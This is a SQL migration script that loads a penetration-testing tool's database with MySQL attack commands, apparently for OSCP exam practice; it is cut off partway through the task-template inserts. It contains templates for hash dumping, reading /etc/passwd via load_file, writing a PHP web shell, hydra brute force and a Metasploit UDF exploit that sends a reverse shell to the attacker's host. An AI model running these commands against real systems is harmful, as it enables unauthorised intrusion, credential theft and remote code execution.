-- Migration 006: MySQL Plugin Command Definitions
-- Populates commands and task templates for MySQL/MariaDB service plugin
-- SCHEMA-ALIGNED with actual database structure
--
-- Date: 2025-10-28
-- Plugin: mysql (3306/tcp)
-- Commands: 25+ MySQL enumeration/exploitation commands
-- Structure: Includes nested task hierarchy (auth-enum parent with children)
--
-- Tables populated:
--   - variables (MySQL-specific placeholders)
--   - commands (command definitions)
--   - command_vars (command-variable links)
--   - command_flags (flag explanations)
--   - command_indicators (success/failure patterns)
--   - command_tags (tag assignments)
--   - plugin_task_templates (task definitions with hierarchy)

BEGIN TRANSACTION;

-- =============================================================================
-- Step 1: Ensure Common + MySQL-Specific Variables
-- =============================================================================

INSERT INTO variables (name, description, data_type, default_value, source)
VALUES
    ('<TARGET>', 'Target IP address or hostname', 'ip', NULL, 'user'),
    ('<PORT>', 'Service port number', 'port', NULL, 'user'),
    ('<LHOST>', 'Local attacker IP (for reverse shells, listeners)', 'ip', NULL, 'config'),
    ('<LPORT>', 'Local attacker port (for reverse shells, listeners)', 'port', '4444', 'config'),
    ('<USER>', 'MySQL username', 'string', 'root', 'user'),
    ('<PASSWORD>', 'MySQL password', 'string', '', 'user'),
    ('<WORDLIST>', 'Password wordlist path', 'file', '/usr/share/wordlists/rockyou.txt', 'config');

-- =============================================================================
-- Step 2: Insert MySQL Commands (25+ commands)
-- =============================================================================

-- QUICK WIN CATEGORY

-- Command 1: Test root without password
INSERT INTO commands (
    id, name, command_template, description, category, subcategory,
    oscp_relevance, notes
) VALUES (
    'mysql-connect-root-nopass',
    'MySQL - Test root without password',
    'mysql -h <TARGET> -u root',
    'Test root login without password (common misconfiguration)',
    'recon',
    'mysql',
    'high',
    'Always test default creds first - saves time. Other common users: admin, mysql, test. Quick win for misconfigurations.'
);

INSERT INTO command_vars (command_id, variable_id, position, is_required, example_value)
VALUES
    ('mysql-connect-root-nopass', (SELECT id FROM variables WHERE name = '<TARGET>'), 1, TRUE, '192.168.45.100');

INSERT INTO command_flags (command_id, flag, explanation)
VALUES
    ('mysql-connect-root-nopass', '-h', 'Target host'),
    ('mysql-connect-root-nopass', '-u', 'Username (root)');

INSERT INTO command_indicators (command_id, indicator_type, pattern, pattern_type, description)
VALUES
    ('mysql-connect-root-nopass', 'success', 'mysql> prompt', 'literal', 'Successful connection - shell access'),
    ('mysql-connect-root-nopass', 'success', 'Welcome to MySQL', 'literal', 'MySQL monitor started'),
    ('mysql-connect-root-nopass', 'failure', 'Access denied', 'literal', 'Authentication failed'),
    ('mysql-connect-root-nopass', 'failure', 'ERROR 1045', 'literal', 'Access denied error');

INSERT INTO tags (name) VALUES ('OSCP:HIGH'), ('QUICK_WIN'), ('MANUAL'), ('REQUIRES_AUTH');
INSERT INTO command_tags (command_id, tag_id) VALUES
    ('mysql-connect-root-nopass', (SELECT id FROM tags WHERE name = 'OSCP:HIGH')),
    ('mysql-connect-root-nopass', (SELECT id FROM tags WHERE name = 'QUICK_WIN')),
    ('mysql-connect-root-nopass', (SELECT id FROM tags WHERE name = 'MANUAL'));

-- Command 2: Banner grabbing
INSERT INTO commands (
    id, name, command_template, description, category, subcategory,
    oscp_relevance, notes
) VALUES (
    'mysql-banner-grab',
    'MySQL - Banner grab for version',
    'nc -vn <TARGET> <PORT>',
    'Identify MySQL version via banner (no auth needed)',
    'recon',
    'mysql',
    'high',
    'Banner reveals exact version - critical for CVE research. MySQL 5.x vs 8.x have different auth methods.'
);

INSERT INTO command_vars (command_id, variable_id, position, is_required, example_value)
VALUES
    ('mysql-banner-grab', (SELECT id FROM variables WHERE name = '<TARGET>'), 1, TRUE, '192.168.45.100'),
    ('mysql-banner-grab', (SELECT id FROM variables WHERE name = '<PORT>'), 2, TRUE, '3306');

INSERT INTO command_flags (command_id, flag, explanation)
VALUES
    ('mysql-banner-grab', '-v', 'Verbose'),
    ('mysql-banner-grab', '-n', 'No DNS');

INSERT INTO command_indicators (command_id, indicator_type, pattern, pattern_type, description)
VALUES
    ('mysql-banner-grab', 'success', 'Version', 'literal', 'Version string visible (5.x/8.x/MariaDB)'),
    ('mysql-banner-grab', 'failure', 'Connection refused', 'literal', 'Port closed or firewall');

INSERT INTO command_tags (command_id, tag_id) VALUES
    ('mysql-banner-grab', (SELECT id FROM tags WHERE name = 'OSCP:HIGH')),
    ('mysql-banner-grab', (SELECT id FROM tags WHERE name = 'QUICK_WIN')),
    ('mysql-banner-grab', (SELECT id FROM tags WHERE name = 'MANUAL'));

-- NMAP NSE CATEGORY

-- Command 3: Nmap NSE scripts
INSERT INTO commands (
    id, name, command_template, description, category, subcategory,
    oscp_relevance, notes
) VALUES (
    'mysql-nmap-enum',
    'nmap - MySQL NSE Enumeration',
    'nmap -sV -p <PORT> --script mysql-empty-password,mysql-info,mysql-users,mysql-databases,mysql-dump-hashes,mysql-vuln-cve2012-2122 <TARGET>',
    'Comprehensive MySQL enumeration via NSE scripts',
    'recon',
    'mysql',
    'high',
    'Some scripts need valid creds. CVE-2012-2122 = auth bypass via race condition. Save with -oA.'
);

INSERT INTO command_vars (command_id, variable_id, position, is_required, example_value)
VALUES
    ('mysql-nmap-enum', (SELECT id FROM variables WHERE name = '<TARGET>'), 1, TRUE, '192.168.45.100'),
    ('mysql-nmap-enum', (SELECT id FROM variables WHERE name = '<PORT>'), 2, TRUE, '3306');

INSERT INTO command_flags (command_id, flag, explanation)
VALUES
    ('mysql-nmap-enum', '-sV', 'Version detection'),
    ('mysql-nmap-enum', '--script', 'Execute NSE scripts'),
    ('mysql-nmap-enum', 'mysql-empty-password', 'Test accounts with no password'),
    ('mysql-nmap-enum', 'mysql-info', 'Get server info'),
    ('mysql-nmap-enum', 'mysql-users', 'List users (requires auth)'),
    ('mysql-nmap-enum', 'mysql-databases', 'List databases (requires auth)'),
    ('mysql-nmap-enum', 'mysql-dump-hashes', 'Extract password hashes (requires auth)'),
    ('mysql-nmap-enum', 'mysql-vuln-cve2012-2122', 'Test auth bypass vulnerability');

INSERT INTO command_indicators (command_id, indicator_type, pattern, pattern_type, description)
VALUES
    ('mysql-nmap-enum', 'success', 'Empty password accounts found', 'literal', 'Accounts without passwords discovered'),
    ('mysql-nmap-enum', 'success', 'User list retrieved', 'literal', 'Users enumerated'),
    ('mysql-nmap-enum', 'success', 'Hashes dumped', 'literal', 'Password hashes extracted'),
    ('mysql-nmap-enum', 'success', 'CVE-2012-2122 vulnerable', 'literal', 'Auth bypass vulnerability present'),
    ('mysql-nmap-enum', 'failure', 'Access denied', 'literal', 'Authentication required');

INSERT INTO tags (name) VALUES ('AUTOMATED'), ('NSE');
INSERT INTO command_tags (command_id, tag_id) VALUES
    ('mysql-nmap-enum', (SELECT id FROM tags WHERE name = 'OSCP:HIGH')),
    ('mysql-nmap-enum', (SELECT id FROM tags WHERE name = 'AUTOMATED'));

-- AUTHENTICATED ENUMERATION CATEGORY

-- Command 4: Show grants (privileges)
INSERT INTO commands (
    id, name, command_template, description, category, subcategory,
    oscp_relevance, notes
) VALUES (
    'mysql-show-grants',
    'MySQL - Check current privileges',
    'mysql -h <TARGET> -u <USER> -p<PASSWORD> -e "SHOW GRANTS; SHOW GRANTS FOR CURRENT_USER();"',
    'Enumerate privileges (FILE and SUPER are critical)',
    'recon',
    'mysql',
    'high',
    'FILE priv = can read/write files. SUPER priv = can create UDFs for code execution.'
);

INSERT INTO command_vars (command_id, variable_id, position, is_required, example_value)
VALUES
    ('mysql-show-grants', (SELECT id FROM variables WHERE name = '<TARGET>'), 1, TRUE, '192.168.45.100'),
    ('mysql-show-grants', (SELECT id FROM variables WHERE name = '<USER>'), 2, TRUE, 'root'),
    ('mysql-show-grants', (SELECT id FROM variables WHERE name = '<PASSWORD>'), 3, FALSE, '');

INSERT INTO command_flags (command_id, flag, explanation)
VALUES
    ('mysql-show-grants', '-e', 'Execute command and exit'),
    ('mysql-show-grants', 'SHOW GRANTS', 'Display granted privileges'),
    ('mysql-show-grants', 'CURRENT_USER()', 'Current authenticated user');

INSERT INTO command_indicators (command_id, indicator_type, pattern, pattern_type, description)
VALUES
    ('mysql-show-grants', 'success', 'FILE privilege', 'literal', 'Can read/write files'),
    ('mysql-show-grants', 'success', 'SUPER privilege', 'literal', 'Can create UDFs'),
    ('mysql-show-grants', 'success', 'ALL PRIVILEGES', 'literal', 'Full administrative access'),
    ('mysql-show-grants', 'failure', 'Access denied', 'literal', 'Authentication failed');

INSERT INTO command_tags (command_id, tag_id) VALUES
    ('mysql-show-grants', (SELECT id FROM tags WHERE name = 'OSCP:HIGH')),
    ('mysql-show-grants', (SELECT id FROM tags WHERE name = 'MANUAL')),
    ('mysql-show-grants', (SELECT id FROM tags WHERE name = 'REQUIRES_AUTH'));

-- Command 5: Dump users and hashes
INSERT INTO commands (
    id, name, command_template, description, category, subcategory,
    oscp_relevance, notes
) VALUES (
    'mysql-enum-users',
    'MySQL - Dump users and hashes',
    'mysql -h <TARGET> -u <USER> -p<PASSWORD> -e "SELECT user,authentication_string,file_priv,Super_priv FROM mysql.user;"',
    'Extract user list with password hashes and privileges',
    'recon',
    'mysql',
    'high',
    'MySQL 5.x: -m 300 (hashcat). MySQL 8.0+: -m 21100 (hashcat). Hash column varies by version.'
);

INSERT INTO command_vars (command_id, variable_id, position, is_required, example_value)
VALUES
    ('mysql-enum-users', (SELECT id FROM variables WHERE name = '<TARGET>'), 1, TRUE, '192.168.45.100'),
    ('mysql-enum-users', (SELECT id FROM variables WHERE name = '<USER>'), 2, TRUE, 'root'),
    ('mysql-enum-users', (SELECT id FROM variables WHERE name = '<PASSWORD>'), 3, FALSE, '');

INSERT INTO command_flags (command_id, flag, explanation)
VALUES
    ('mysql-enum-users', 'authentication_string', 'Password hash (MySQL 5.7+)'),
    ('mysql-enum-users', 'file_priv', 'FILE privilege (Y/N)'),
    ('mysql-enum-users', 'Super_priv', 'SUPER privilege (Y/N)');

INSERT INTO command_indicators (command_id, indicator_type, pattern, pattern_type, description)
VALUES
    ('mysql-enum-users', 'success', 'Hashes visible', 'literal', 'Password hashes extracted'),
    ('mysql-enum-users', 'success', 'FILE/SUPER identified', 'literal', 'Privileged users found'),
    ('mysql-enum-users', 'failure', 'Access denied', 'literal', 'Insufficient privileges');

INSERT INTO command_tags (command_id, tag_id) VALUES
    ('mysql-enum-users', (SELECT id FROM tags WHERE name = 'OSCP:HIGH')),
    ('mysql-enum-users', (SELECT id FROM tags WHERE name = 'REQUIRES_AUTH'));

-- Command 6: List databases
INSERT INTO commands (
    id, name, command_template, description, category, subcategory,
    oscp_relevance, notes
) VALUES (
    'mysql-enum-databases',
    'MySQL - List databases',
    'mysql -h <TARGET> -u <USER> -p<PASSWORD> -e "SHOW DATABASES;"',
    'Enumerate accessible databases',
    'recon',
    'mysql',
    'medium',
    'Look for app databases (wordpress, joomla, webapp). Default DBs less interesting.'
);

INSERT INTO command_vars (command_id, variable_id, position, is_required, example_value)
VALUES
    ('mysql-enum-databases', (SELECT id FROM variables WHERE name = '<TARGET>'), 1, TRUE, '192.168.45.100'),
    ('mysql-enum-databases', (SELECT id FROM variables WHERE name = '<USER>'), 2, TRUE, 'root'),
    ('mysql-enum-databases', (SELECT id FROM variables WHERE name = '<PASSWORD>'), 3, FALSE, '');

INSERT INTO command_indicators (command_id, indicator_type, pattern, pattern_type, description)
VALUES
    ('mysql-enum-databases', 'success', 'Database list displayed', 'literal', 'Databases enumerated'),
    ('mysql-enum-databases', 'success', 'Non-default DBs found', 'literal', 'Application databases found'),
    ('mysql-enum-databases', 'failure', 'Access denied', 'literal', 'Insufficient privileges');

INSERT INTO tags (name) VALUES ('OSCP:MEDIUM');
INSERT INTO command_tags (command_id, tag_id) VALUES
    ('mysql-enum-databases', (SELECT id FROM tags WHERE name = 'OSCP:MEDIUM')),
    ('mysql-enum-databases', (SELECT id FROM tags WHERE name = 'REQUIRES_AUTH'));

-- FILE OPERATIONS CATEGORY

-- Command 7: Check secure_file_priv
INSERT INTO commands (
    id, name, command_template, description, category, subcategory,
    oscp_relevance, notes
) VALUES (
    'mysql-check-secure-file-priv',
    'MySQL - Check file operation restrictions',
    'mysql -h <TARGET> -u <USER> -p<PASSWORD> -e "SHOW VARIABLES LIKE ''secure_file_priv'';"',
    'Check if file operations are restricted',
    'recon',
    'mysql',
    'high',
    'Empty = full access (older/misconfigured). Modern MySQL defaults to restricted.'
);

INSERT INTO command_vars (command_id, variable_id, position, is_required, example_value)
VALUES
    ('mysql-check-secure-file-priv', (SELECT id FROM variables WHERE name = '<TARGET>'), 1, TRUE, '192.168.45.100'),
    ('mysql-check-secure-file-priv', (SELECT id FROM variables WHERE name = '<USER>'), 2, TRUE, 'root'),
    ('mysql-check-secure-file-priv', (SELECT id FROM variables WHERE name = '<PASSWORD>'), 3, FALSE, '');

INSERT INTO command_flags (command_id, flag, explanation)
VALUES
    ('mysql-check-secure-file-priv', 'secure_file_priv', 'File operation restrictions (MySQL 5.5.53+)');

INSERT INTO command_indicators (command_id, indicator_type, pattern, pattern_type, description)
VALUES
    ('mysql-check-secure-file-priv', 'success', 'Empty', 'literal', 'Unrestricted (read/write anywhere)'),
    ('mysql-check-secure-file-priv', 'success', 'NULL', 'literal', 'Disabled completely'),
    ('mysql-check-secure-file-priv', 'success', 'Path', 'literal', 'Restricted to directory'),
    ('mysql-check-secure-file-priv', 'failure', 'Access denied', 'literal', 'Insufficient privileges');

INSERT INTO command_tags (command_id, tag_id) VALUES
    ('mysql-check-secure-file-priv', (SELECT id FROM tags WHERE name = 'OSCP:HIGH')),
    ('mysql-check-secure-file-priv', (SELECT id FROM tags WHERE name = 'QUICK_WIN')),
    ('mysql-check-secure-file-priv', (SELECT id FROM tags WHERE name = 'REQUIRES_AUTH'));

-- Command 8: Read system files
INSERT INTO commands (
    id, name, command_template, description, category, subcategory,
    oscp_relevance, notes
) VALUES (
    'mysql-read-file',
    'MySQL - Read system files',
    'mysql -h <TARGET> -u <USER> -p<PASSWORD> -e "SELECT load_file(''/etc/passwd'');"',
    'Read arbitrary files (requires FILE privilege)',
    'exploitation',
    'mysql',
    'high',
    'Common targets: /etc/passwd, SSH keys, web configs, debian.cnf. Check secure_file_priv first.'
);

INSERT INTO command_vars (command_id, variable_id, position, is_required, example_value)
VALUES
    ('mysql-read-file', (SELECT id FROM variables WHERE name = '<TARGET>'), 1, TRUE, '192.168.45.100'),
    ('mysql-read-file', (SELECT id FROM variables WHERE name = '<USER>'), 2, TRUE, 'root'),
    ('mysql-read-file', (SELECT id FROM variables WHERE name = '<PASSWORD>'), 3, FALSE, '');

INSERT INTO command_flags (command_id, flag, explanation)
VALUES
    ('mysql-read-file', 'load_file()', 'MySQL function to read file contents');

INSERT INTO command_indicators (command_id, indicator_type, pattern, pattern_type, description)
VALUES
    ('mysql-read-file', 'success', 'File contents displayed', 'literal', 'File read successfully'),
    ('mysql-read-file', 'success', '/etc/passwd visible', 'literal', 'System file accessible'),
    ('mysql-read-file', 'failure', 'NULL', 'literal', 'Not found/no permission'),
    ('mysql-read-file', 'failure', 'secure-file-priv blocks', 'literal', 'Restrictions in place');

INSERT INTO command_tags (command_id, tag_id) VALUES
    ('mysql-read-file', (SELECT id FROM tags WHERE name = 'OSCP:HIGH')),
    ('mysql-read-file', (SELECT id FROM tags WHERE name = 'REQUIRES_AUTH'));

-- Command 9: Write web shell
INSERT INTO commands (
    id, name, command_template, description, category, subcategory,
    oscp_relevance, notes
) VALUES (
    'mysql-write-shell',
    'MySQL - Write web shell (INTO OUTFILE)',
    'mysql -h <TARGET> -u <USER> -p<PASSWORD> -e "SELECT ''<?php system(\$_GET[\"cmd\"]); ?>'' INTO OUTFILE ''/var/www/html/shell.php'';"',
    'Write PHP web shell (requires FILE priv + web root write access)',
    'exploitation',
    'mysql',
    'high',
    'Web roots: /var/www/html (Debian), /usr/share/nginx/html (nginx), C:\xampp\htdocs (Windows). Cannot overwrite - use unique names.'
);

INSERT INTO command_vars (command_id, variable_id, position, is_required, example_value)
VALUES
    ('mysql-write-shell', (SELECT id FROM variables WHERE name = '<TARGET>'), 1, TRUE, '192.168.45.100'),
    ('mysql-write-shell', (SELECT id FROM variables WHERE name = '<USER>'), 2, TRUE, 'root'),
    ('mysql-write-shell', (SELECT id FROM variables WHERE name = '<PASSWORD>'), 3, FALSE, '');

INSERT INTO command_flags (command_id, flag, explanation)
VALUES
    ('mysql-write-shell', 'INTO OUTFILE', 'Write query result to file'),
    ('mysql-write-shell', '<?php system($_GET["cmd"]); ?>', 'Minimal PHP web shell');

INSERT INTO command_indicators (command_id, indicator_type, pattern, pattern_type, description)
VALUES
    ('mysql-write-shell', 'success', 'Query OK', 'literal', 'Command executed'),
    ('mysql-write-shell', 'success', 'File created', 'literal', 'Shell written'),
    ('mysql-write-shell', 'success', 'Shell accessible via browser', 'literal', 'RCE achieved'),
    ('mysql-write-shell', 'failure', 'secure-file-priv blocks', 'literal', 'Restrictions in place'),
    ('mysql-write-shell', 'failure', 'Permission denied', 'literal', 'Cannot write to path'),
    ('mysql-write-shell', 'failure', 'File exists', 'literal', 'File already present');

INSERT INTO command_tags (command_id, tag_id) VALUES
    ('mysql-write-shell', (SELECT id FROM tags WHERE name = 'OSCP:HIGH')),
    ('mysql-write-shell', (SELECT id FROM tags WHERE name = 'REQUIRES_AUTH'));

-- CREDENTIAL EXTRACTION CATEGORY

-- Command 10: Extract debian-sys-maint password
INSERT INTO commands (
    id, name, command_template, description, category, subcategory,
    oscp_relevance, notes
) VALUES (
    'mysql-debian-cnf',
    'MySQL - Extract debian-sys-maint password',
    'cat /etc/mysql/debian.cnf',
    'Extract plaintext password for maintenance user (Debian/Ubuntu)',
    'recon',
    'mysql',
    'high',
    'Debian/Ubuntu specific. debian-sys-maint has elevated privileges. Quick win if shell access.'
);

INSERT INTO command_indicators (command_id, indicator_type, pattern, pattern_type, description)
VALUES
    ('mysql-debian-cnf', 'success', 'Plaintext password visible', 'literal', 'Credentials extracted'),
    ('mysql-debian-cnf', 'success', 'debian-sys-maint user found', 'literal', 'Maintenance user present'),
    ('mysql-debian-cnf', 'failure', 'Permission denied', 'literal', 'Insufficient file access'),
    ('mysql-debian-cnf', 'failure', 'File not found', 'literal', 'Not Debian/Ubuntu');

INSERT INTO tags (name) VALUES ('LINUX'), ('REQUIRES_SHELL');
INSERT INTO command_tags (command_id, tag_id) VALUES
    ('mysql-debian-cnf', (SELECT id FROM tags WHERE name = 'OSCP:HIGH')),
    ('mysql-debian-cnf', (SELECT id FROM tags WHERE name = 'QUICK_WIN')),
    ('mysql-debian-cnf', (SELECT id FROM tags WHERE name = 'LINUX')),
    ('mysql-debian-cnf', (SELECT id FROM tags WHERE name = 'REQUIRES_SHELL'));

-- Command 11: Crack password hashes
INSERT INTO commands (
    id, name, command_template, description, category, subcategory,
    oscp_relevance, notes
) VALUES (
    'mysql-crack-hashes',
    'hashcat - MySQL password cracking',
    'hashcat -a 0 -m 300 hashes.txt <WORDLIST>',
    'Offline hash cracking (mysql_native_password)',
    'exploitation',
    'mysql',
    'medium',
    'MySQL 5.x = -m 300, MySQL 8.0+ = -m 21100. Hashes start with * (5.x) or $mysql-sha2$ (8.0+).'
);

INSERT INTO command_vars (command_id, variable_id, position, is_required, example_value)
VALUES
    ('mysql-crack-hashes', (SELECT id FROM variables WHERE name = '<WORDLIST>'), 1, TRUE, '/usr/share/wordlists/rockyou.txt');

INSERT INTO command_flags (command_id, flag, explanation)
VALUES
    ('mysql-crack-hashes', '-a 0', 'Straight wordlist attack'),
    ('mysql-crack-hashes', '-m 300', 'MySQL4.1/5.x (mysql_native_password)'),
    ('mysql-crack-hashes', '-m 21100', 'MySQL 8.0+ (caching_sha2_password)');

INSERT INTO command_indicators (command_id, indicator_type, pattern, pattern_type, description)
VALUES
    ('mysql-crack-hashes', 'success', 'Cracked passwords displayed', 'literal', 'Passwords recovered'),
    ('mysql-crack-hashes', 'success', 'Status: Cracked', 'literal', 'Hashes broken'),
    ('mysql-crack-hashes', 'failure', 'Exhausted', 'literal', 'Wordlist exhausted'),
    ('mysql-crack-hashes', 'failure', 'Wrong hash format', 'literal', 'Incorrect hash type');

INSERT INTO command_tags (command_id, tag_id) VALUES
    ('mysql-crack-hashes', (SELECT id FROM tags WHERE name = 'OSCP:MEDIUM'));

-- BRUTE FORCE CATEGORY

-- Command 12: Credential brute-force
INSERT INTO commands (
    id, name, command_template, description, category, subcategory,
    oscp_relevance, notes
) VALUES (
    'mysql-hydra-bruteforce',
    'hydra - MySQL credential brute-force',
    'hydra -L /usr/share/seclists/Usernames/top-usernames-shortlist.txt -P /usr/share/seclists/Passwords/Common-Credentials/10-million-password-list-top-100.txt mysql://<TARGET>',
    'Brute-force credentials (very noisy, slow, often fails)',
    'exploitation',
    'mysql',
    'low',
    'Brute-forcing MySQL is slow and usually not the intended OSCP path. Try default creds first.'
);

INSERT INTO command_vars (command_id, variable_id, position, is_required, example_value)
VALUES
    ('mysql-hydra-bruteforce', (SELECT id FROM variables WHERE name = '<TARGET>'), 1, TRUE, '192.168.45.100');

INSERT INTO command_flags (command_id, flag, explanation)
VALUES
    ('mysql-hydra-bruteforce', '-L', 'Username list'),
    ('mysql-hydra-bruteforce', '-P', 'Password list');

INSERT INTO command_indicators (command_id, indicator_type, pattern, pattern_type, description)
VALUES
    ('mysql-hydra-bruteforce', 'success', 'Valid credentials found', 'literal', 'Credentials discovered'),
    ('mysql-hydra-bruteforce', 'failure', 'No creds found', 'literal', 'Attack unsuccessful'),
    ('mysql-hydra-bruteforce', 'failure', 'Rate-limited', 'literal', 'Too many attempts'),
    ('mysql-hydra-bruteforce', 'failure', 'Lockout', 'literal', 'Account locked');

INSERT INTO tags (name) VALUES ('OSCP:LOW'), ('NOISY');
INSERT INTO command_tags (command_id, tag_id) VALUES
    ('mysql-hydra-bruteforce', (SELECT id FROM tags WHERE name = 'OSCP:LOW')),
    ('mysql-hydra-bruteforce', (SELECT id FROM tags WHERE name = 'NOISY'));

-- METASPLOIT CATEGORY

-- Command 13: MSF hashdump
INSERT INTO commands (
    id, name, command_template, description, category, subcategory,
    oscp_relevance, notes
) VALUES (
    'mysql-msf-hashdump',
    'Metasploit - MySQL hash dump',
    'msfconsole -q -x "use auxiliary/scanner/mysql/mysql_hashdump; set RHOSTS <TARGET>; set RPORT <PORT>; set USERNAME <USER>; set PASSWORD <PASSWORD>; run; exit"',
    'Automated hash dumping via Metasploit (requires creds)',
    'recon',
    'mysql',
    'medium',
    'Also try: mysql_authbypass_hashdump (CVE-2012-2122), mysql_enum (full enumeration)'
);

INSERT INTO command_vars (command_id, variable_id, position, is_required, example_value)
VALUES
    ('mysql-msf-hashdump', (SELECT id FROM variables WHERE name = '<TARGET>'), 1, TRUE, '192.168.45.100'),
    ('mysql-msf-hashdump', (SELECT id FROM variables WHERE name = '<PORT>'), 2, TRUE, '3306'),
    ('mysql-msf-hashdump', (SELECT id FROM variables WHERE name = '<USER>'), 3, TRUE, 'root'),
    ('mysql-msf-hashdump', (SELECT id FROM variables WHERE name = '<PASSWORD>'), 4, FALSE, '');

INSERT INTO command_flags (command_id, flag, explanation)
VALUES
    ('mysql-msf-hashdump', '-q', 'Quiet mode (no banner)'),
    ('mysql-msf-hashdump', '-x', 'Execute commands and exit');

INSERT INTO command_indicators (command_id, indicator_type, pattern, pattern_type, description)
VALUES
    ('mysql-msf-hashdump', 'success', 'User hashes extracted', 'literal', 'Hashes dumped'),
    ('mysql-msf-hashdump', 'success', '[+] indicators', 'literal', 'Success indicators'),
    ('mysql-msf-hashdump', 'failure', 'Authentication failed', 'literal', 'Invalid credentials'),
    ('mysql-msf-hashdump', 'failure', 'Access denied', 'literal', 'Insufficient privileges');

INSERT INTO command_tags (command_id, tag_id) VALUES
    ('mysql-msf-hashdump', (SELECT id FROM tags WHERE name = 'OSCP:MEDIUM')),
    ('mysql-msf-hashdump', (SELECT id FROM tags WHERE name = 'AUTOMATED')),
    ('mysql-msf-hashdump', (SELECT id FROM tags WHERE name = 'REQUIRES_AUTH'));

-- Command 14: MSF UDF exploit
INSERT INTO commands (
    id, name, command_template, description, category, subcategory,
    oscp_relevance, notes
) VALUES (
    'mysql-msf-udf',
    'Metasploit - UDF code execution',
    'msfconsole -q -x "use exploit/multi/mysql/mysql_udf_payload; set RHOSTS <TARGET>; set RPORT <PORT>; set USERNAME <USER>; set PASSWORD <PASSWORD>; set PAYLOAD linux/x64/shell/reverse_tcp; set LHOST <LHOST>; run; exit"',
    'Automated UDF privilege escalation via Metasploit',
    'exploitation',
    'mysql',
    'medium',
    'Requires: root MySQL creds + MySQL running as root + SUPER privilege. Windows: use windows/shell/reverse_tcp payload.'
);

INSERT INTO command_vars (command_id, variable_id, position, is_required, example_value)
VALUES
    ('mysql-msf-udf', (SELECT id FROM variables WHERE name = '<TARGET>'), 1, TRUE, '192.168.45.100'),
    ('mysql-msf-udf', (SELECT id FROM variables WHERE name = '<PORT>'), 2, TRUE, '3306'),
    ('mysql-msf-udf', (SELECT id FROM variables WHERE name = '<USER>'), 3, TRUE, 'root'),
    ('mysql-msf-udf', (SELECT id FROM variables WHERE name = '<PASSWORD>'), 4, FALSE, ''),
    ('mysql-msf-udf', (SELECT id FROM variables WHERE name = '<LHOST>'), 5, TRUE, '192.168.45.X');

INSERT INTO command_indicators (command_id, indicator_type, pattern, pattern_type, description)
VALUES
    ('mysql-msf-udf', 'success', 'Shell received', 'literal', 'Reverse shell connected'),
    ('mysql-msf-udf', 'success', 'Session opened', 'literal', 'Exploit successful'),
    ('mysql-msf-udf', 'failure', 'MySQL not running as root', 'literal', 'Insufficient system privileges'),
    ('mysql-msf-udf', 'failure', 'SUPER privilege missing', 'literal', 'Cannot create UDFs');

INSERT INTO tags (name) VALUES ('EXPLOIT');
INSERT INTO command_tags (command_id, tag_id) VALUES
    ('mysql-msf-udf', (SELECT id FROM tags WHERE name = 'OSCP:MEDIUM')),
    ('mysql-msf-udf', (SELECT id FROM tags WHERE name = 'AUTOMATED')),
    ('mysql-msf-udf', (SELECT id FROM tags WHERE name = 'EXPLOIT')),
    ('mysql-msf-udf', (SELECT id FROM tags WHERE name = 'REQUIRES_AUTH'));

-- CONFIGURATION FILES CATEGORY

-- Command 15: Find MySQL config files
INSERT INTO commands (
    id, name, command_template, description, category, subcategory,
    oscp_relevance, notes
) VALUES (
    'mysql-find-configs',
    'MySQL - Locate configuration files',
    'find / -name my.cnf -o -name my.ini -o -name .my.cnf 2>/dev/null',
    'Find all MySQL configuration files (may contain passwords)',
    'recon',
    'mysql',
    'medium',
    'Config files: /etc/mysql/my.cnf, /etc/my.cnf, ~/.my.cnf (Linux), my.ini (Windows). Look for plaintext passwords, enabled logging.'
);

INSERT INTO command_indicators (command_id, indicator_type, pattern, pattern_type, description)
VALUES
    ('mysql-find-configs', 'success', 'Config files found', 'literal', 'Configuration files located'),
    ('mysql-find-configs', 'failure', 'Permission denied', 'literal', 'Insufficient access');

INSERT INTO tags (name) VALUES ('WINDOWS');
INSERT INTO command_tags (command_id, tag_id) VALUES
    ('mysql-find-configs', (SELECT id FROM tags WHERE name = 'OSCP:MEDIUM')),
    ('mysql-find-configs', (SELECT id FROM tags WHERE name = 'LINUX')),
    ('mysql-find-configs', (SELECT id FROM tags WHERE name = 'WINDOWS')),
    ('mysql-find-configs', (SELECT id FROM tags WHERE name = 'REQUIRES_SHELL'));

-- Command 16: Check MySQL history
INSERT INTO commands (
    id, name, command_template, description, category, subcategory,
    oscp_relevance, notes
) VALUES (
    'mysql-history',
    'MySQL - Check command history',
    'cat ~/.mysql_history',
    'Read MySQL shell command history (may contain credentials, queries)',
    'recon',
    'mysql',
    'high',
    'MySQL shell saves command history like bash. Often contains plaintext passwords from CREATE USER or GRANT commands. Quick win.'
);

INSERT INTO command_indicators (command_id, indicator_type, pattern, pattern_type, description)
VALUES
    ('mysql-history', 'success', 'Commands with passwords visible', 'literal', 'Credentials in history'),
    ('mysql-history', 'success', 'Interesting queries found', 'literal', 'Valuable queries present'),
    ('mysql-history', 'failure', 'File not found', 'literal', 'No history file'),
    ('mysql-history', 'failure', 'Empty history', 'literal', 'No commands saved');

INSERT INTO command_tags (command_id, tag_id) VALUES
    ('mysql-history', (SELECT id FROM tags WHERE name = 'OSCP:HIGH')),
    ('mysql-history', (SELECT id FROM tags WHERE name = 'QUICK_WIN')),
    ('mysql-history', (SELECT id FROM tags WHERE name = 'LINUX')),
    ('mysql-history', (SELECT id FROM tags WHERE name = 'REQUIRES_SHELL'));

-- =============================================================================
-- Step 3: Create MySQL Plugin Task Templates
-- =============================================================================

-- Root parent task
INSERT INTO plugin_task_templates (
    plugin_id, task_id, task_name, task_type, parent_task_id,
    command_id, priority, description, tags
) VALUES (
    (SELECT id FROM service_plugins WHERE name = 'mysql'),
    'mysql-enum-root',
    'MySQL Enumeration',
    'parent',
    NULL,
    NULL,
    0,
    'Comprehensive MySQL enumeration and exploitation',
    '["OSCP:HIGH"]'
);

-- Task 1: Quick wins (priority 1-2)
INSERT INTO plugin_task_templates (
    plugin_id, task_id, task_name, task_type, parent_task_id,
    command_id, priority, description, tags
) VALUES (
    (SELECT id FROM service_plugins WHERE name = 'mysql'),
    'mysql-connect-root',
    'Test root without password',
    'command',
    (SELECT id FROM plugin_task_templates WHERE task_id = 'mysql-enum-root' AND plugin_id = (SELECT id FROM service_plugins WHERE name = 'mysql')),
    'mysql-connect-root-nopass',
    1,
    'Test root login without password (common misconfiguration)',
    '["OSCP:HIGH", "QUICK_WIN", "MANUAL"]'
);

INSERT INTO plugin_task_templates (
    plugin_id, task_id, task_name, task_type, parent_task_id,
    command_id, priority, description, tags
) VALUES (
    (SELECT id FROM service_plugins WHERE name = 'mysql'),
    'mysql-banner',
    'Banner grab for version',
    'command',
